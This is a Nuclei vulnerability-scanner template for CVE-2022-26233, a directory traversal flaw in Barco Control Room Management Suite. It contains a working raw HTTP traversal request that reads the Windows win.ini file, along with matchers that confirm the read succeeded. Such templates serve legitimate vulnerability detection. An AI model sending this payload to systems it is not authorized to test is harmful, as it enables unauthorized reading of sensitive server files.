nuclei-templates/cves/2022/CVE-2022-26233.yaml

33 lines
968 B
YAML
Raw Normal View History

2022-05-05 01:55:44 +00:00
id: CVE-2022-26233
info:
name: Barco Control Room Management Suite - Directory Traversal
author: 0x_Akoko
severity: high
description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
reference:
- https://0day.today/exploit/37579
- https://www.cvedetails.com/cve/CVE-2022-26233
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-26233
cwe-id: CWE-22
tags: cve,cve2022,barco,lfi
requests:
- raw:
- |+
GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
Host: {{Hostname}}
2022-05-05 01:55:44 +00:00
unsafe: true
2022-05-05 01:55:44 +00:00
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and